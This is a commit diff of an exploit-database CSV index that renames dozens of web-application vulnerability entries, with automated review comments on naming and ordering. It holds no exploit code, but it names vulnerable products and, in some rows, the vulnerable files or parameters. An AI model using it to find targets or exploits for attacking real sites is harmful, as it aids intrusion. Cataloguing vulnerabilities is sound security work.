DB: 2017-01-04

1 new exploits

Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution
Nitrotech 0.0.3a - Remote Code Execution

Basic-CMS - 'index.php' SQL Injection
Basic-CMS - SQL Injection
Simple Customer 1.2 - (Authentication Bypass) SQL Injection
SaturnCMS - (view) Blind SQL Injection
Simple Customer 1.2 - Authentication Bypass
SaturnCMS - Blind SQL Injection

Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion
Free Directory Script 1.1.1 - 'API_HOME_DIR' Parameter Remote File Inclusion

MyTopix 1.3.0 - (notes send) SQL Injection
MyTopix 1.3.0 - SQL Injection

RevSense - (Authentication Bypass) SQL Injection
RevSense 1.0 - Authentication Bypass

AskPert - (Authentication Bypass) SQL Injection
AskPert - Authentication Bypass

Natterchat 1.1 - (Authentication Bypass) SQL Injection
Natterchat 1.1 - Authentication Bypass
Natterchat 1.12 - (Authentication Bypass) SQL Injection
ToursManager - 'tourview.php tourid' Blind SQL Injection
Natterchat 1.12 - Authentication Bypass
ToursManager - 'tourview.php' Blind SQL Injection
VCalendar - 'VCalendar.mdb' Remote Database Disclosure
Joomla! Component Thyme 1.0 - (event) SQL Injection
e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection
VCalendar - Remote Database Disclosure
Joomla! Component Thyme 1.0 - SQL Injection
e107 Plugin ZoGo-Shop 1.15.4 - 'product' Parameter SQL Injection

Vlog System 1.1 - (blog.php user) SQL Injection
Vlog System 1.1 - SQL Injection
Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection
Netartmedia Blog System - 'image.php id' SQL Injection
PG Real Estate - (Authentication Bypass) SQL Injection
Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection
PG Job Site - (poll_view_id) Blind SQL Injection
Netartmedia Cars Portal 2.0 - SQL Injection
Netartmedia Blog System - SQL Injection
PG Real Estate - Authentication Bypass
Pilot Group PG Roommate Finder Solution - Authentication Bypass
PG Job Site - Blind SQL Injection
bandwebsite 1.5 - SQL Injection / Cross-Site Scripting
WebStudio CMS - 'index.php pageid' Blind SQL Injection
Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting
WebStudio CMS - Blind SQL Injection

nitrotech 0.0.3a - Remote File Inclusion / SQL Injection
Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection
WebStudio eHotel - (pageid) Blind SQL Injection
WebStudio eCatalogue - (pageid) Blind SQL Injection
FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection
WebStudio eHotel - Blind SQL Injection
WebStudio eCatalogue - Blind SQL Injection
FAQ Manager 1.2 - 'categorie.php' SQL Injection
FAQ Manager 1.2 - (config_path) Remote File Inclusion
Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection
FAQ Manager 1.2 - 'header.php' Remote File Inclusion
Clean CMS 1.5 - Blind SQL Injection

SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure
SimpleBlog 3.0 - Database Disclosure
VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection
Jamit Job Board 3.x - (show_emp) Blind SQL Injection
WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)
VideoGirls BiZ - Blind SQL Injection
Jamit Job Board 3.x - Blind SQL Injection
My Click Counter 1.0 - Authentication Bypass

ParsBlogger - 'blog.asp wr' SQL Injection
ParsBlogger - 'blog.asp' SQL Injection

TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion
TxtBlog 1.0 Alpha - Local File Inclusion
Family Project 2.x - (Authentication Bypass) SQL Injection
RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection
Family Project 2.x - Authentication Bypass
RakhiSoftware Shopping Cart - SQL Injection

Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection
Ocean12 Membership Manager Pro - Authentication Bypass

Turnkey Arcade Script - 'id' SQL Injection (1)
Turnkey Arcade Script - SQL Injection (1)
Basic-CMS - 'index.php id' Blind SQL Injection
Booking Centre 2.01 - (Authentication Bypass) SQL Injection
Basic-CMS - Blind SQL Injection
Booking Centre 2.01 - Authentication Bypass

Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure
Natterchat 1.12 - Database Disclosure

VIDEOSCRIPT.us - (Authentication Bypass) SQL Injection
VIDEOSCRIPT.us - Authentication Bypass

Turnkey Arcade Script - 'id' SQL Injection (2)
Turnkey Arcade Script - SQL Injection (2)

WEB Calendar - Remote Database Disclosure
Web Calendar - Remote Database Disclosure

Crossday Discuz! 2.0/3.0 - Cross-Site Scripting
Discuz! 2.0/3.0 - Cross-Site Scripting

8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities
SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities
Offensive Security 2017-01-04 05:01:17 +00:00
parent bac881f89a
commit c512deac7f
3 changed files with 58 additions and 78 deletions


@ -16877,7 +16877,7 @@ id,file,description,date,author,platform,type,port
2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0
2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0
2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0
2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution",2006-10-30,Kacper,php,webapps,0
2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0
2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Inclusion",2006-10-30,Kacper,php,webapps,0
2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0
2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0
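Review bot: the new title for 2685 drops the affected file, includes/common.php, which was the only locator in the description. Other rows retitled in this commit keep the file in single quotes (for example 'categorie.php' for 7224), so "Nitrotech 0.0.3a - 'includes/common.php' Remote Code Execution" would follow that convention without losing the detail.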
@ -18989,7 +18989,7 @@ id,file,description,date,author,platform,type,port
5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' Parameter SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0
5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' Parameter SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5836,platforms/php/webapps/5836.txt,"Basic-CMS - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5836,platforms/php/webapps/5836.txt,"Basic-CMS - SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' Parameter SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0
5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - 'id' Parameter SQL Injection",2008-06-17,anonymous,php,webapps,0
@ -20001,47 +20001,47 @@ id,file,description,date,author,platform,type,port
7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0
7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0
7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0
7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - Authentication Bypass",2008-11-17,d3b4g,php,webapps,0
7147,platforms/php/webapps/7147.txt,"SaturnCMS - Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0
7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - 'API_HOME_DIR' Parameter Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0
7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0
7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload",2008-11-19,Batter,php,webapps,0
7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusion",2008-11-19,StAkeR,php,webapps,0
7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0
7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - SQL Injection",2008-11-19,cOndemned,php,webapps,0
7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0
7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0
7163,platforms/php/webapps/7163.txt,"RevSense 1.0 - Authentication Bypass",2008-11-19,d3b4g,php,webapps,0
7164,platforms/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps,0
7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0
7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0
7166,platforms/php/webapps/7166.txt,"AskPert - Authentication Bypass",2008-11-19,TR-ShaRk,php,webapps,0
7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0
7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0
7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - (Authentication Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0
7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - Authentication Bypass",2008-11-20,Bl@ckbe@rD,php,webapps,0
7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - 'messages.php' SQL Injection",2008-11-20,irk4z,php,webapps,0
7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message Cross-Site Request Forgery / Worm Exploit",2008-11-20,Mx,php,webapps,0
7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Authentication Bypass) SQL Injection",2008-11-20,Stack,php,webapps,0
7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php tourid' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0
7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - Authentication Bypass",2008-11-20,Stack,php,webapps,0
7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0
7179,platforms/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0
7180,platforms/php/webapps/7180.txt,"VCalendar - 'VCalendar.mdb' Remote Database Disclosure",2008-11-20,Swan,php,webapps,0
7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0
7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection",2008-11-22,NoGe,php,webapps,0
7180,platforms/php/webapps/7180.txt,"VCalendar - Remote Database Disclosure",2008-11-20,Swan,php,webapps,0
7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0
7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' Parameter SQL Injection",2008-11-22,NoGe,php,webapps,0
7185,platforms/php/webapps/7185.php,"Discuz! - Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0
7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) SQL Injection",2008-11-22,Mr.SQL,php,webapps,0
7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - SQL Injection",2008-11-22,Mr.SQL,php,webapps,0
7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0
7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0
7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0
7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps,0
7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' Parameter SQL Injection",2008-11-23,snakespc,php,webapps,0
7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps,0
7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0
7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0
7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0
7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0
7202,platforms/php/webapps/7202.txt,"PG Job Site - (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0
7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - SQL Injection",2008-11-23,snakespc,php,webapps,0
7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - SQL Injection",2008-11-23,snakespc,php,webapps,0
7200,platforms/php/webapps/7200.txt,"PG Real Estate - Authentication Bypass",2008-11-23,ZoRLu,php,webapps,0
7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - Authentication Bypass",2008-11-23,ZoRLu,php,webapps,0
7202,platforms/php/webapps/7202.txt,"PG Job Site - Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0
7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0
7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0
7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0
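Review bot: the rows for 7146, 7163, 7166, 7172, 7175, 7200 and 7201 lose "SQL Injection" from the description and keep only "Authentication Bypass", so a search of this CSV by vulnerability class no longer returns them. A form that keeps both, as 2687 already does with "Login Bypass (SQL Injection)", would preserve the root cause. Separately, 7163 gains a version ("RevSense 1.0") that the old title did not carry; confirm it against 7163.txt.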
@ -20050,49 +20050,49 @@ id,file,description,date,author,platform,type,port
7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0
7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0
7214,platforms/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,php,webapps,0
7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0
7216,platforms/php/webapps/7216.txt,"WebStudio CMS - 'index.php pageid' Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0
7215,platforms/php/webapps/7215.txt,"Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0
7216,platforms/php/webapps/7216.txt,"WebStudio CMS - Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0
7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0
7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0
7218,platforms/php/webapps/7218.txt,"Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0
7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0
7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0
7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - 'categorie.php' SQL Injection",2008-11-25,cOndemned,php,webapps,0
7225,platforms/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
7227,platforms/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0
7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0
7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0
7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - 'header.php' Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,php,webapps,0
7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0
7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0
7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0
7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps,0
7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0
7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0
7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0
7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
40987,platforms/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",2017-01-03,Adam,php,webapps,0
7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0
7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0
7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0
7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0
7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0
7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure",2008-11-27,Pouya_Server,php,webapps,0
7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Authentication Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0
7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0
7248,platforms/php/webapps/7248.txt,"Family Project 2.x - Authentication Bypass",2008-11-27,The_5p3ctrum,php,webapps,0
7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - SQL Injection",2008-11-27,XaDoS,php,webapps,0
7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps,0
7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0
7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0
7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0
7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0
7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0
7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - 'id' SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0
7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0
7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0
7259,platforms/asp/webapps/7259.txt,"Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting",2008-11-27,Bl@ckbe@rD,asp,webapps,0
7260,platforms/php/webapps/7260.txt,"Basic-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0
7261,platforms/php/webapps/7261.txt,"Basic-CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0
7261,platforms/php/webapps/7261.txt,"Basic-CMS - Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,php,webapps,0
7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0
7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0
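Review bot: the row for 40987 is inserted between 7235 and 7237, in the slot of the removed 7236 row, so the id column is not ascending at this point. 40383 sits between 9512 and 9518 in the same way, so if slot reuse is intended it should be documented for consumers that rely on id order; otherwise place the row at its sorted position. Also in this hunk, 7229 changes from "(config_path)" to "'header.php'", which replaces a parameter name with a file name rather than reformatting it; confirm which one 7229.txt actually names.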
@ -20181,7 +20181,7 @@ id,file,description,date,author,platform,type,port
7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0
7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,php,webapps,0
7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0
7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0
7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0
@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port
8622,platforms/php/webapps/8622.pl,"webSPELL 4.2.0e - (page) Blind SQL Injection",2009-05-07,DNX,php,webapps,0
8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,php,webapps,0
8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0
8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - (Authentication Bypass) SQL Injection",2009-05-07,snakespc,php,webapps,0
8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - Authentication Bypass",2009-05-07,snakespc,php,webapps,0
8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0
8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0
8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0
@ -21504,7 +21504,7 @@ id,file,description,date,author,platform,type,port
9504,platforms/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0
9505,platforms/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0
9510,platforms/php/webapps/9510.txt,"Joomla! Component com_siirler 1.2 - 'sid' SQL Injection",2009-08-25,v3n0m,php,webapps,0
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - 'id' SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
